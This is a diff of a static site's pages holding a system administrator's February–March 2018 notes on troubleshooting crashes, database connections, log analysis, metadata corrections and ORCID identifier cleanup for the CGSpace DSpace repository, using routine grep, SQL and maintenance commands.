      • I’m trying to find a way to determine what was using all those Tomcat sessions, but parsing the DSpace log is hard because some IPs are IPv6, which contain colons!
      • Looking at the first crash this morning around 11, I see these IPv4 addresses making requests around 10 and 11AM:
      -
      $ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq -c | sort -n | tail -n 20
      +
      $ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq -c | sort -n | tail -n 20
            34 ip_addr=46.229.168.67
            34 ip_addr=46.229.168.73
            37 ip_addr=46.229.168.76
      @@ -304,27 +304,26 @@ Exception in thread "http-bio-127.0.0.1-8081-exec-58" java.lang.OutOfM
       
      • These IPs made thousands of sessions today:
      -
      $ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +
      $ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       530
      -$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       859
      -$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       610
      -$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       8
      -$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       826
      -$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       727
      -$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       181
      -$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       24
      -$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       166
      -$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       992
      -
       
      • Let’s investigate who these IPs belong to:
          @@ -355,13 +354,13 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
        • Helix84 recommends restarting PostgreSQL instead of Tomcat because it restarts quicker
        • This is how the connections looked when it crashed this afternoon:
        -
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
        +
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
               5 dspaceApi
             290 dspaceWeb
         
        • This is how it is right now:
        -
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
        +
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
               5 dspaceApi
               5 dspaceWeb
         
          @@ -378,7 +377,7 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
        • Switch authority.controlled off and change authorLookup to lookup, and the ORCID badge doesn’t show up on the item
        • Leave all settings but change choices.presentation to lookup and ORCID badge is there and item submission uses LC Name Authority and it breaks with this error:
        -
        Field dc_contributor_author has choice presentation of type "select", it may NOT be authority-controlled.
        +
        Field dc_contributor_author has choice presentation of type "select", it may NOT be authority-controlled.
         
        • If I change choices.presentation to suggest it give this error:
        @@ -409,18 +408,18 @@ authors-2018-02-05.csv: line 100, char 18, byte 4179: After a first byte between
      • I updated my fix-metadata-values.py and delete-metadata-values.py scripts on the scripts page: https://github.com/ilri/DSpace/wiki/Scripts
      • I ran the 342 author corrections (after trimming whitespace and excluding those with || and other syntax errors) on CGSpace:
      -
      $ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
      +
      $ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
       
      • Then I ran a full Discovery re-indexing:
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
       $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
       
      -
      dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
      +
      dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
          text_value    |              authority               | confidence 
       -----------------+--------------------------------------+------------
        Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 |        600
      @@ -434,9 +433,9 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
       (8 rows)
       
       dspace=# begin;
      -dspace=# update metadatavalue set text_value='Duncan, Alan', authority='a6486522-b08a-4f7a-84f9-3a73ce56034d', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Duncan, Alan%';
      +dspace=# update metadatavalue set text_value='Duncan, Alan', authority='a6486522-b08a-4f7a-84f9-3a73ce56034d', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Duncan, Alan%';
       UPDATE 216
      -dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
      +dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
         text_value  |              authority               | confidence 
       --------------+--------------------------------------+------------
        Duncan, Alan | a6486522-b08a-4f7a-84f9-3a73ce56034d |        600
      @@ -464,7 +463,7 @@ dspace=# commit;
       
    • I see that in April, 2017 I just used a SQL query to get a user’s submissions by checking the dc.description.provenance field
    • So for Abenet, I can check her submissions in December, 2017 with:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*yabowork.*2017-12.*';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*yabowork.*2017-12.*';
     
    • I emailed Peter to ask whether we can move DSpace Test to a new Linode server and attach 300 GB of disk space to it
    • This would be using Linode’s new block storage volumes
    • @@ -484,7 +483,7 @@ Caused by: java.net.SocketException: Socket closed
    • Could be because of the removeAbandoned="true" that I enabled in the JDBC connection pool last week?
    -
    $ grep -c "java.net.SocketException: Socket closed" dspace.log.2018-02-*
    +
    $ grep -c "java.net.SocketException: Socket closed" dspace.log.2018-02-*
     dspace.log.2018-02-01:0
     dspace.log.2018-02-02:0
     dspace.log.2018-02-03:0
    @@ -535,27 +534,27 @@ $ tidy -xml -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
     
  • Sisay exported all ILRI, CIAT, etc authors from ORCID and sent a list of 600+
  • Peter combined it with mine and we have 1204 unique ORCIDs!
  • -
    $ grep -coE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv
    +
    $ grep -coE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv
     1204
    -$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
    +$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
     1204
     
    • Also, save that regex for the future because it will be very useful!
    • -
    • CIAT sent a list of their authors' ORCIDs and combined with ours there are now 1227:
    • +
    • CIAT sent a list of their authors’ ORCIDs and combined with ours there are now 1227:
    -
    $ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
    +
    $ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
     1227
     
    • There are some formatting issues with names in Peter’s list, so I should remember to re-generate the list of names from ORCID’s API once we’re done
    • The dspace cleanup -v currently fails on CGSpace with the following:
     - Deleting bitstream record from database (ID: 149473)
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(149473) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(149473) is still referenced from table "bundle".
     
    • The solution is to update the bitstream table, as I’ve discovered several other times in 2016 and 2017:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);'
     UPDATE 1
     
    • Then the cleanup process will continue for awhile and hit another foreign key conflict, and eventually it will complete after you manually resolve them all
    • @@ -575,25 +574,25 @@ UPDATE 1
    • I only looked quickly in the logs but saw a bunch of database errors
    • PostgreSQL connections are currently:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | uniq -c
           2 dspaceApi
           1 dspaceWeb
           3 dspaceApi
     
    • I see shitloads of memory errors in Tomcat’s logs:
    -
    # grep -c "Java heap space" /var/log/tomcat7/catalina.out
    +
    # grep -c "Java heap space" /var/log/tomcat7/catalina.out
     56
     
    • And shit tons of database connections abandoned:
    -
    # grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
    +
    # grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
     612
     
    • I have no fucking idea why it crashed
    • The XMLUI activity looks like:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "15/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "15/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         715 63.143.42.244
         746 213.55.99.121
         886 68.180.228.157
    @@ -610,7 +609,7 @@ UPDATE 1
     
  • I made a pull request to fix it ((#354)[https://github.com/ilri/DSpace/pull/354])
  • I should remember to update existing values in PostgreSQL too:
  • -
    dspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
    +
    dspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
     UPDATE 2
     

    2018-02-18

      @@ -646,13 +645,13 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
    # zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
     168571
    -# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | wc -l
    +# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | wc -l
     8188
     
    • Only 8,000 requests during those four hours, out of 170,000 the whole day!
    • And the usage of XMLUI, REST, and OAI looks SUPER boring:
    -
    # zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E "15/Feb/2018:(16|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         111 95.108.181.88
         158 45.5.184.221
         201 104.196.152.243
    @@ -677,7 +676,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
     
    • Combined list of CGIAR author ORCID iDs is up to 1,500:
    -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l  
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l  
     1571
     
    • I updated my resolve-orcids-from-solr.py script to be able to resolve ORCID identifiers from a text file so I renamed it to resolve-orcids.py
    • @@ -692,13 +691,13 @@ Ahmad Maryudi: 0000-0001-5051-7217
    Looking up the name associated with ORCID iD: 0000-0001-9634-1958
     Traceback (most recent call last):
    -  File "./resolve-orcids.py", line 111, in <module>
    +  File "./resolve-orcids.py", line 111, in <module>
         read_identifiers_from_file()
    -  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
    +  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
         resolve_orcid_identifiers(orcids)
    -  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
    -    family_name = data['name']['family-name']['value']
    -TypeError: 'NoneType' object is not subscriptable
    +  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
    +    family_name = data['name']['family-name']['value']
    +TypeError: 'NoneType' object is not subscriptable
     
    • According to ORCID that identifier’s family-name is null so that sucks
    • I fixed the script so that it checks if the family name is null
    • @@ -706,13 +705,13 @@ TypeError: 'NoneType' object is not subscriptable
    Looking up the name associated with ORCID iD: 0000-0002-1300-3636
     Traceback (most recent call last):
    -  File "./resolve-orcids.py", line 117, in <module>
    +  File "./resolve-orcids.py", line 117, in <module>
         read_identifiers_from_file()
    -  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
    +  File "./resolve-orcids.py", line 37, in read_identifiers_from_file
         resolve_orcid_identifiers(orcids)
    -  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
    -    if data['name']['given-names']:
    -TypeError: 'NoneType' object is not subscriptable
    +  File "./resolve-orcids.py", line 65, in resolve_orcid_identifiers
    +    if data['name']['given-names']:
    +TypeError: 'NoneType' object is not subscriptable
     
    • According to ORCID that identifier’s entire name block is null!
    @@ -722,14 +721,14 @@ TypeError: 'NoneType' object is not subscriptable
  • Discuss some of the issues with null values and poor-quality names in some ORCID identifiers with Abenet and I think we’ll now only use ORCID iDs that have been sent to use from partners, not those extracted via keyword searches on orcid.org
  • This should be the version we use (the existing controlled vocabulary generated from CGSpace’s Solr authority core plus the IDs sent to us so far by partners):
  • -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > 2018-02-20-combined.txt
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > 2018-02-20-combined.txt
     
    • I updated the resolve-orcids.py to use the “credit-name” if it exists in a profile, falling back to “given-names” + “family-name”
    • Also, I added color coded output to the debug messages and added a “quiet” mode that supresses the normal behavior of printing results to the screen
    • I’m using this as the test input for resolve-orcids.py:
    $ cat orcid-test-values.txt 
    -# valid identifier with 'given-names' and 'family-name'
    +# valid identifier with 'given-names' and 'family-name'
     0000-0001-5019-1368
     
     # duplicate identifier
    @@ -738,16 +737,16 @@ TypeError: 'NoneType' object is not subscriptable
     # invalid identifier
     0000-0001-9634-19580
     
    -# has a 'credit-name' value we should prefer
    +# has a 'credit-name' value we should prefer
     0000-0002-1735-7458
     
    -# has a blank 'credit-name' value
    +# has a blank 'credit-name' value
     0000-0001-5199-5528
     
    -# has a null 'name' object
    +# has a null 'name' object
     0000-0002-1300-3636
     
    -# has a null 'family-name' value
    +# has a null 'family-name' value
     0000-0001-9634-1958
     
     # missing ORCID identifier
    @@ -770,7 +769,7 @@ TypeError: 'NoneType' object is not subscriptable
     
  • It looks like Sisay restarted Tomcat because I was offline
  • There was absolutely nothing interesting going on at 13:00 on the server, WTF?
  • -
    # cat /var/log/nginx/*.log | grep -E "22/Feb/2018:13" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # cat /var/log/nginx/*.log | grep -E "22/Feb/2018:13" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          55 192.99.39.235
          60 207.46.13.26
          62 40.77.167.38
    @@ -784,7 +783,7 @@ TypeError: 'NoneType' object is not subscriptable
     
    • Otherwise there was pretty normal traffic the rest of the day:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Feb/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         839 216.244.66.245
        1074 68.180.228.117
        1114 157.55.39.100
    @@ -798,9 +797,9 @@ TypeError: 'NoneType' object is not subscriptable
     
    • So I don’t see any definite cause for this crash, I see a shit ton of abandoned PostgreSQL connections today around 1PM!
    -
    # grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
    +
    # grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
     729
    -# grep 'Feb 22, 2018 1' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' 
    +# grep 'Feb 22, 2018 1' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' 
     519
     
    • I think the removeAbandonedTimeout might still be too low (I increased it from 60 to 90 seconds last week)
    • @@ -820,12 +819,12 @@ TypeError: 'NoneType' object is not subscriptable
    • A few days ago Abenet sent me the list of ORCID iDs from CCAFS
    • We currently have 988 unique identifiers:
    -
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l          
    +
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l          
     988
     
    • After adding the ones from CCAFS we now have 1004:
    -
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
    +
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
     1004
     
    • I will add them to DSpace Test but Abenet says she’s still waiting to set us ILRI’s list
    • @@ -853,7 +852,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
    • The query in Solr would simply be orcid_id:*
    • Assuming I know that authority record with id:d7ef744b-bbd4-4171-b449-00e37e1b776f, then I could query PostgreSQL for all metadata records using that authority:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and authority='d7ef744b-bbd4-4171-b449-00e37e1b776f';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and authority='d7ef744b-bbd4-4171-b449-00e37e1b776f';
      metadata_value_id | resource_id | metadata_field_id |        text_value         | text_lang | place |              authority               | confidence | resource_type_id 
     -------------------+-------------+-------------------+---------------------------+-----------+-------+--------------------------------------+------------+------------------
                2726830 |       77710 |                 3 | Rodríguez Chalarca, Jairo |           |     2 | d7ef744b-bbd4-4171-b449-00e37e1b776f |        600 |                2
    @@ -896,18 +895,18 @@ Nor Azwadi: 0000-0001-9634-1958
     
  • I need to see which SQL queries are run during that time
  • And only a few hours after I disabled the removeAbandoned thing CGSpace went down and lo and behold, there were 264 connections, most of which were idle:
  • -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
         279 dspaceWeb
    -$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
    +$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
     218
     
    • So I’m re-enabling the removeAbandoned setting
    • I grabbed a snapshot of the active connections in pg_stat_activity for all queries running longer than 2 minutes:
    -
    dspace=# \copy (SELECT now() - query_start as "runtime", application_name, usename, datname, waiting, state, query
    +
    dspace=# \copy (SELECT now() - query_start as "runtime", application_name, usename, datname, waiting, state, query
       FROM  pg_stat_activity
    -  WHERE now() - query_start > '2 minutes'::interval
    +  WHERE now() - query_start > '2 minutes'::interval
      ORDER BY runtime DESC) to /tmp/2018-02-27-postgresql.txt
     COPY 263
     
      @@ -936,7 +935,7 @@ COPY 263
    • CGSpace crashed today, the first HTTP 499 in nginx’s access.log was around 09:12
    • There’s nothing interesting going on in nginx’s logs around that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Feb/2018:09:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Feb/2018:09:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          65 197.210.168.174
          74 213.55.99.121
          74 66.249.66.90
    @@ -955,7 +954,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
     
    • Memory issues seem to be common this month:
    -
    $ grep -c 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-* 
    +
    $ grep -c 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-* 
     dspace.log.2018-02-01:0
     dspace.log.2018-02-02:0
     dspace.log.2018-02-03:0
    @@ -987,7 +986,7 @@ dspace.log.2018-02-28:1
     
    • Top ten users by session during the first twenty minutes of 9AM:
    -
    $ grep -E '2018-02-28 09:(0|1)' dspace.log.2018-02-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq -c | sort -n | tail -n 10
    +
    $ grep -E '2018-02-28 09:(0|1)' dspace.log.2018-02-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq -c | sort -n | tail -n 10
          18 session_id=F2DFF64D3D707CD66AE3A873CEC80C49
          19 session_id=92E61C64A79F0812BE62A3882DA8F4BA
          21 session_id=57417F5CB2F9E3871E609CEEBF4E001F
    @@ -1006,7 +1005,7 @@ dspace.log.2018-02-28:1
     
  • I think I’ll increase the JVM heap size on CGSpace from 6144m to 8192m because I’m sick of this random crashing shit and the server has memory and I’d rather eliminate this so I can get back to solving PostgreSQL issues and doing other real work
  • Run the few corrections from earlier this month for sponsor on CGSpace:
  • -
    cgspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
    +
    cgspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
     UPDATE 3
     
    • I finally got a CGIAR account so I logged into CGSpace with it and tried to delete my old unfinished submissions (22 of them)
    • diff --git a/docs/2018-03/index.html b/docs/2018-03/index.html index 16cd9a544..a158fb047 100644 --- a/docs/2018-03/index.html +++ b/docs/2018-03/index.html @@ -24,7 +24,7 @@ Export a CSV of the IITA community metadata for Martin Mueller Export a CSV of the IITA community metadata for Martin Mueller "/> - + @@ -122,8 +122,8 @@ Export a CSV of the IITA community metadata for Martin Mueller
    • There were some records using a non-breaking space in their AGROVOC subject field
    • I checked and tested some author corrections from Peter from last week, and then applied them on CGSpace
    -
    $ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3      
    -$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace-p 'fuuu' -f dc.contributor.author -m 3
    +
    $ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3      
    +$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace-p 'fuuu' -f dc.contributor.author -m 3
     
    • This time there were no errors in whitespace but I did have to correct one incorrectly encoded accent character
    • Add new CRP subject “GRAIN LEGUMES AND DRYLAND CEREALS” to input-forms.xml (#358)
    • @@ -132,16 +132,16 @@ $ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u d
    • Run all system updates on DSpace Test and reboot server
    • I ran the orcid-authority-to-item.py script on CGSpace and mapped 2,864 ORCID identifiers from Solr to item metadata
    -
    $ ./orcid-authority-to-item.py -db dspace -u dspace -p 'fuuu' -s http://localhost:8081/solr -d
    +
    $ ./orcid-authority-to-item.py -db dspace -u dspace -p 'fuuu' -s http://localhost:8081/solr -d
     
    • I ran the DSpace cleanup script on CGSpace and it threw an error (as always):
    -
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(150659) is still referenced from table "bundle".
    +
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(150659) is still referenced from table "bundle".
     
    • The solution is, as always:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);'
     UPDATE 1
     
    • Apply the proposed PostgreSQL indexes from DS-3636 (pull request #1791 on CGSpace (linode18)
    • @@ -180,7 +180,7 @@ UPDATE 1 es (16 rows) -dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('en','EN','En','en_','EN_US','en_U','eng'); +dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('en','EN','En','en_','EN_US','en_U','eng'); UPDATE 122227 dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2; text_lang @@ -199,7 +199,7 @@ dspacetest=# select distinct text_lang from metadatavalue where resource_type_id
    • On second inspection it looks like dc.description.provenance fields use the text_lang “en” so that’s probably why there are over 100,000 fields changed…
    • If I skip that, there are about 2,000, which seems more reasonably like the amount of fields users have edited manually, or fucked up during CSV import, etc:
    -
    dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('EN','En','en_','EN_US','en_U','eng');
    +
    dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('EN','En','en_','EN_US','en_U','eng');
     UPDATE 2309
     
    • I will apply this on CGSpace right now
    • @@ -207,11 +207,11 @@ UPDATE 2309
